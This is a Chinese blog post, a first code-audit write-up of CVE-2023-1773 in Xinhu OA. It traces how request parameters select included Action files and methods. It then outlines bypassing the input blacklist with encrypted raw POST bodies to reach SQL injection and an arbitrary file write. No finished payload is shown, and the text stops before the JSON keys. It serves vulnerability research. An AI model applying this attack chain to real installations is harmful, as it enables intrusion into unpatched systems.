

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon.png">
  <link rel="icon" href="/img/icon.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Potat0w0">
  <meta name="keywords" content="">
  
    <meta name="description" content="CVE-2023-1773分析产品：信呼oa 影响版本：&lt;&#x3D;2.32 开源地址：https:&#x2F;&#x2F;github.com&#x2F;rainrocka&#x2F;xinhu&#x2F;commits&#x2F;master&#x2F; 该博客为本人第一篇代码审计相关文章，本人才疏学浅，博客乃用于记录个人所学，因此许多地方会较为赘述，细节，这些都是个人的收获，如觉繁琐请见谅 根据官网说明先搭建好框架环境：  在分析漏洞点所在之前，我们需">
<meta property="og:type" content="article">
<meta property="og:title" content="记一次CMS代码审计">
<meta property="og:url" content="http://example.com/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/index.html">
<meta property="og:site_name" content="Potat0w0">
<meta property="og:description" content="CVE-2023-1773分析产品：信呼oa 影响版本：&lt;&#x3D;2.32 开源地址：https:&#x2F;&#x2F;github.com&#x2F;rainrocka&#x2F;xinhu&#x2F;commits&#x2F;master&#x2F; 该博客为本人第一篇代码审计相关文章，本人才疏学浅，博客乃用于记录个人所学，因此许多地方会较为赘述，细节，这些都是个人的收获，如觉繁琐请见谅 根据官网说明先搭建好框架环境：  在分析漏洞点所在之前，我们需">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/img/cover/xinhu.png">
<meta property="article:published_time" content="2023-12-23T13:38:37.000Z">
<meta property="article:modified_time" content="2023-12-28T08:05:40.560Z">
<meta property="article:author" content="Potat0w0">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/cover/xinhu.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>记一次CMS代码审计 - Potat0w0</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":50,"cursorChar":"💕","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Potat0w0&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>Links</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="记一次CMS代码审计"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        Potat0w0
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-12-23 21:38" pubdate>
          December 23, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.8k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          65 mins
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> views
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">记一次CMS代码审计</h1>
            
              <p class="note note-info">
                
                  
                    Last updated on 10 days ago
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="CVE-2023-1773分析"><a href="#CVE-2023-1773分析" class="headerlink" title="CVE-2023-1773分析"></a>CVE-2023-1773分析</h1><p>产品：信呼oa</p>
<p>影响版本：&lt;&#x3D;2.32</p>
<p>开源地址：<a target="_blank" rel="noopener" href="https://github.com/rainrocka/xinhu/commits/master/">https://github.com/rainrocka/xinhu/commits/master/</a></p>
<p><strong>该博客为本人第一篇代码审计相关文章，本人才疏学浅，博客乃用于记录个人所学，因此许多地方会较为赘述，细节，这些都是个人的收获，如觉繁琐请见谅</strong></p>
<p>根据官网说明先搭建好框架环境：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231223220725299.png" srcset="/img/loading.gif" lazyload></p>
<p>在分析漏洞点所在之前，我们需要对框架的功能有一个了解，什么参数是起到什么作用，哪些变量我们可以控制哪些不行，着重观察GET或者POST值处</p>
<h3 id="index-php"><a href="#index-php" class="headerlink" title="index.php"></a>index.php</h3><p>主程序入口在index.php，先对其进行审计</p>
<p>代码不多，包含了个config.php是存放框架的各种配置。留意<code>$d</code>,<code>$m</code>,<code>$a</code>三个变量。有个函数$rock-&gt;get()，get()方法是什么？</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231224012235078.png" srcset="/img/loading.gif" lazyload></p>
<p>跟进$rock，<code>$rock      = new rockClass();</code>，那就看看get()在rockClass()类中是怎样定义的：</p>
<p>代码也不多</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span>(<span class="hljs-params"><span class="hljs-variable">$name</span>,<span class="hljs-variable">$dev</span>=<span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$lx</span>=<span class="hljs-number">0</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$val</span>=<span class="hljs-variable">$dev</span>;<br>    <span class="hljs-comment">//$val初始化</span><br>    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-variable">$name</span>]))<span class="hljs-variable">$val</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-variable">$name</span>];<br>    <span class="hljs-comment">//从GET参数中获取值传给$val，</span><br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">isempt</span>(<span class="hljs-variable">$val</span>))<span class="hljs-variable">$val</span>=<span class="hljs-variable">$dev</span>;<br>    <span class="hljs-comment">//判断$val是否为“空”，isempty()条件下述提到，若为空，则让$val重新为初始值</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">jmuncode</span>(<span class="hljs-variable">$val</span>, <span class="hljs-variable">$lx</span>, <span class="hljs-variable">$name</span>);<br>    <span class="hljs-comment">//返回jmuncode()操作后的值，该函数用于对参数进行安全操作</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>isempt()方法，即若传入字符为空(各种意义的空)<strong>并且</strong>字符不为数字则返回true：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">isempt</span>(<span class="hljs-params"><span class="hljs-variable">$str</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$bool</span>=<span class="hljs-literal">false</span>;<br>    <span class="hljs-keyword">if</span>( (<span class="hljs-variable">$str</span>==<span class="hljs-string">&#x27;&#x27;</span>||<span class="hljs-variable">$str</span>==<span class="hljs-literal">NULL</span>||<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$str</span>)) &amp;&amp; (!<span class="hljs-title function_ invoke__">is_numeric</span>(<span class="hljs-variable">$str</span>)) )<span class="hljs-variable">$bool</span>=<span class="hljs-literal">true</span>;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$bool</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>jmuncode()代码暂且不赘述。总结get()方法的作用就是获取GET传参中的值，并做了一定的xss过滤等处理，其中对单引号进行了转义，去除空格</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231227024823556.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="View-php"><a href="#View-php" class="headerlink" title="View.php"></a>View.php</h3><p>到这了，那么看看谁用了<code>$d</code>,<code>$m</code>,<code>$a</code>这仨变量，Find Usages，发现在View.php中调用了这三个变量</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231224022931965.png" srcset="/img/loading.gif" lazyload></p>
<p>红色框为这三个变量赋初值(若未传入则为默认值)</p>
<p>重点在黄色框，如果<code>$m</code>中存在’|’字符，则将m变量以’|’为分割划分为两部分<code>$m</code>和<code>$_m</code></p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231224023101719.png" srcset="/img/loading.gif" lazyload></p>
<p>下面引入了$rock中自定义的一个格式化字符串函数strformat()：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231224023508227.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">strformat</span>(<span class="hljs-params"><span class="hljs-variable">$str</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$len</span> = <span class="hljs-title function_ invoke__">func_num_args</span>();<br>    <span class="hljs-comment">//这里可以收获了func_num_args()获取传入函数的参数数量</span><br>    <span class="hljs-variable">$arr</span> = <span class="hljs-keyword">array</span>();<br>    <span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span>=<span class="hljs-number">1</span>; <span class="hljs-variable">$i</span>&lt;<span class="hljs-variable">$len</span>; <span class="hljs-variable">$i</span>++)<span class="hljs-variable">$arr</span>[] = <span class="hljs-title function_ invoke__">func_get_arg</span>(<span class="hljs-variable">$i</span>);<br>    <span class="hljs-comment">//func_get_arg()配合func_num_args()打组合拳自定义函数传入参数的数量</span><br>    <span class="hljs-comment">//为什么从i=1开始？因为格式化字符串函数传入的第一个参数是含占位符的待格式化字符串</span><br>    <span class="hljs-variable">$s</span>  = <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">stringformat</span>(<span class="hljs-variable">$str</span>, <span class="hljs-variable">$arr</span>);<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$s</span>;<br>&#125;<br>......<br>......<br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">stringformat</span>(<span class="hljs-params"><span class="hljs-variable">$str</span>, <span class="hljs-variable">$arr</span>=<span class="hljs-keyword">array</span>(<span class="hljs-params"></span>)</span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$s</span>	= <span class="hljs-variable">$str</span>;<br>    <span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>; <span class="hljs-variable">$i</span>&lt;<span class="hljs-title function_ invoke__">count</span>(<span class="hljs-variable">$arr</span>); <span class="hljs-variable">$i</span>++)&#123;<br>        <span class="hljs-variable">$s</span>=<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&#x27;?&#x27;</span>.<span class="hljs-variable">$i</span>.<span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$arr</span>[<span class="hljs-variable">$i</span>], <span class="hljs-variable">$s</span>);<br>        <span class="hljs-comment">//一个简单的replace，占位符为&#x27;?&#x27;加上一个数字代表用后面第几个参数来填充该位置</span><br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$s</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>例如这个：<code>include_once($rock-&gt;strformat(&#39;?0/?1/?1Action.php&#39;,ROOT_PATH, $p));</code>最终格式化后的字符串为：<code>&quot;ROOT_PATH/&quot;.$p.&quot;/&quot;.$p.&quot;Action.php&quot;</code>，看起来试图包含住一个以Action.php结尾的文件，正巧刚刚翻目录的时候看到了一堆一堆的Action结尾的文件。那么<code>ROOT_PATH</code>,<code>$p</code>，这俩又是什么东东呢？</p>
<p>在config.php中对ROOT_PATH有定义：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">define</span>(<span class="hljs-string">&#x27;ROOT_PATH&#x27;</span>,<span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&#x27;\\&#x27;</span>,<span class="hljs-string">&#x27;/&#x27;</span>,<span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-keyword">__FILE__</span>))));   <span class="hljs-comment">//系统跟目录路径</span><br></code></pre></td></tr></table></figure>

<p>$p变量向上跟进，为PROJECT，PROJECT再向上跟进，定义了它为’webmain’目录，此时p如果没有收到GET传参的p就会默认为’webmain’</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$p</span>        = PROJECT;<br>......<br><span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">defined</span>(<span class="hljs-string">&#x27;PROJECT&#x27;</span>))<span class="hljs-title function_ invoke__">define</span>(<span class="hljs-string">&#x27;PROJECT&#x27;</span>, <span class="hljs-variable">$rock</span>-&gt;<span class="hljs-title function_ invoke__">get</span>(<span class="hljs-string">&#x27;p&#x27;</span>, <span class="hljs-string">&#x27;webmain&#x27;</span>));<br></code></pre></td></tr></table></figure>

<p>可以留意$ajaxbool变量，下面会用的<code>$ajaxbool   = $rock-&gt;get(&#39;ajaxbool&#39;, $ajaxbool);</code>，总之不要放过任何一个调用get()方法的变量，都是可控的</p>
<h4 id="控制文件被包含"><a href="#控制文件被包含" class="headerlink" title="控制文件被包含"></a>控制文件被包含</h4><p>这里有个一路径中的变量<code>$actpath</code>，被两个下文被包含住的变量<code>$actfile</code>以及<code>$actfile1</code>给拼接，弄明白是如何构造的：</p>
<p>用ROOT_PATH，$p，$d，$_m分别填充前面的一个格式化路径</p>
<p>$_m我们可以控制GET传入m参数时’|’字符两边的字符串来控制，$p和ROOT_PATH，$d在上面存在一个简单的处理，如果不是以’&#x2F;‘结尾就给他加上’&#x2F;‘</p>
<p>总结起来，假设我们的根目录是&#x2F;var&#x2F;www&#x2F;html&#x2F;，传入p&#x3D;webmain&amp;d&#x3D;task&amp;m&#x3D;file|api</p>
<p>那么$actpath就是”&#x2F;var&#x2F;www&#x2F;html&#x2F;webmain&#x2F;task&#x2F;api”</p>
<p>紧接着下面的$actfile就是”&#x2F;var&#x2F;www&#x2F;html&#x2F;webmain&#x2F;task&#x2F;api&#x2F;fileAction.php”，</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231224030752422.png" srcset="/img/loading.gif" lazyload></p>
<p>也就是该文件被包含：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231224031851702.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="控制类和方法"><a href="#控制类和方法" class="headerlink" title="控制类和方法"></a>控制类和方法</h4><p>其实actfile1我们并不能做到真正完全的可控，因为其最后的拼接是<code>$_m.$_m</code>，就意味着最后包含的php文件的前缀名必须与上级目录相同，具有一定的局限性，这里我们侧重观察actfile被包含后的操作(实际上actfile1被包含后也确实并没有进行更多的操作了)，接下来的分析围绕着actfile，$classname变量由$a和”ClassAction”拼接起来，$a可控。，$actname变量由$a和”Action”拼接起来，$a可控。如果ajaxbool为true那么$actname由$a和”Ajax”拼接，$ajaxbool可控(前文提到控制GET传参)。然后new一个名为$classname的值的类，判断该对象中是否存在名为$actname的方法，如果存在，就执行并把结果echo出来</p>
<p>beforeAction()和afterAction()是父类Action类中的抽象方法</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231224135401990.png" srcset="/img/loading.gif" lazyload></p>
<p>如果ajaxbool为false(默认)或者html，就进行模板渲染</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231224140348334.png" srcset="/img/loading.gif" lazyload></p>
<p>至此，我们已经可以做到控制包含工作目录下的Action文件，并且控制执行其中的方法，接下来就是寻找一个Action文件中有可利用的类方法了</p>
<h3 id="寻找可利用漏洞"><a href="#寻找可利用漏洞" class="headerlink" title="寻找可利用漏洞"></a>寻找可利用漏洞</h3><p>&#x2F;webmain&#x2F;system&#x2F;cog&#x2F;conAction.php下：</p>
<p>cogClassAction::savecongAjax()方法中有一处文件写入，只要可以控制<code>$adminnme</code>就可以控制任意文件写入，在对oa系统本身功能的浏览后发现并不能直接在oa内部修改管理员的名字，思路就是寻找一个sql注入的点，</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228135254312.png" srcset="/img/loading.gif" lazyload></p>
<p>观察到其实有许多的action都存在sql注入的点，但是get()和post()方法获取参数时引入了黑名单检查直接将许多危险字符(串)过滤了。</p>
<p>注意到&#x2F;webmain&#x2F;task&#x2F;api&#x2F;reimplatAction.php下的indexAction()方法也存在sql注入点，但是该方法有点特殊：</p>
<p>$body直接调用getpostdata()方法从请求体中获取数据，然后经过一次解密后得到$bodystr，对$bodystr再json解码后，获取其中键值对进行sql操作，思考：我们怎么样操作使得加密后的字符串可控呢？</p>
<p>答：源代码就在自己手上直接调试就好了啊kora！把自己想构造的json发送出去，打印出加密后的字符串不就行了吗</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228140034116.png" srcset="/img/loading.gif" lazyload></p>
<p>追踪getpostdata()方法，可以看到是一点过滤都没有的。那我们就可以通过直接从请求体发送加密后的字符串从而避免经过get()和post()参数的过滤了！经过strunlook()方法解密后直接拼接到sql语句中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getpostdata</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$postdata</span> = <span class="hljs-string">&#x27;&#x27;</span>;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;HTTP_RAW_POST_DATA&#x27;</span>]))<span class="hljs-variable">$postdata</span> = <span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&#x27;HTTP_RAW_POST_DATA&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$postdata</span>==<span class="hljs-string">&#x27;&#x27;</span>)<span class="hljs-variable">$postdata</span> = <span class="hljs-title function_ invoke__">trim</span>(<span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;php://input&#x27;</span>));<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$postdata</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>跟踪下解密方法：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$bodystr</span> = <span class="hljs-variable language_">$this</span>-&gt;jm-&gt;<span class="hljs-title function_ invoke__">strunlook</span>(<span class="hljs-variable">$body</span>, <span class="hljs-variable">$key</span>);<span class="hljs-comment">//reimplatAction.php</span><br>-&gt;<br>    ...<br><span class="hljs-variable language_">$this</span>-&gt;jm		= <span class="hljs-title function_ invoke__">c</span>(<span class="hljs-string">&#x27;jm&#x27;</span>, <span class="hljs-literal">true</span>);<span class="hljs-comment">//reimpaltAction.php，那c是啥？跟踪c()方法</span><br>-&gt;<br>    ...<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">c</span>(<span class="hljs-params"><span class="hljs-variable">$name</span>, <span class="hljs-variable">$inbo</span>=<span class="hljs-literal">true</span>, <span class="hljs-variable">$param1</span>=<span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$param2</span>=<span class="hljs-string">&#x27;&#x27;</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-variable">$class</span>	= <span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-variable">$name</span>.<span class="hljs-string">&#x27;Chajian&#x27;</span>;<br>	<span class="hljs-variable">$path</span>	= <span class="hljs-string">&#x27;&#x27;</span>.ROOT_PATH.<span class="hljs-string">&#x27;/include/chajian/&#x27;</span>.<span class="hljs-variable">$class</span>.<span class="hljs-string">&#x27;.php&#x27;</span>;<br>	<span class="hljs-variable">$cls</span>	= <span class="hljs-literal">NULL</span>;<br>	<span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$path</span>))&#123;<br>		<span class="hljs-keyword">include_once</span>(<span class="hljs-variable">$path</span>);<br>		<span class="hljs-keyword">if</span>(<span class="hljs-variable">$inbo</span>)<span class="hljs-variable">$cls</span>	= <span class="hljs-keyword">new</span> <span class="hljs-variable">$class</span>(<span class="hljs-variable">$param1</span>, <span class="hljs-variable">$param2</span>);<br>	&#125;<br>	<span class="hljs-keyword">return</span> <span class="hljs-variable">$cls</span>;	<br>&#125;<span class="hljs-comment">//rockFun.php，分析代码后发现c()方法是包含/include/chajian/下对应参数名的插件php文件，此处对应追踪到jmChajian.php</span><br>-&gt;<br>    ...<br><br></code></pre></td></tr></table></figure>

<p>找到了strlook()和strunlook()方法</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228141414784.png" srcset="/img/loading.gif" lazyload></p>
<p>在本地调试时将加密后的字符串打印出来：</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228140651710.png" srcset="/img/loading.gif" lazyload></p>
<p>经测试没问题，那么我们就可以根据自己的需求，构造恶意json了</p>
<p><img src="/2023/12/23/%E8%AE%B0%E4%B8%80%E6%AC%A1CMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20231228141508877.png" srcset="/img/loading.gif" lazyload></p>
<p>回到reimplatAction.php，分析可利用点：</p>
<p>json有这几个键值对：</p>
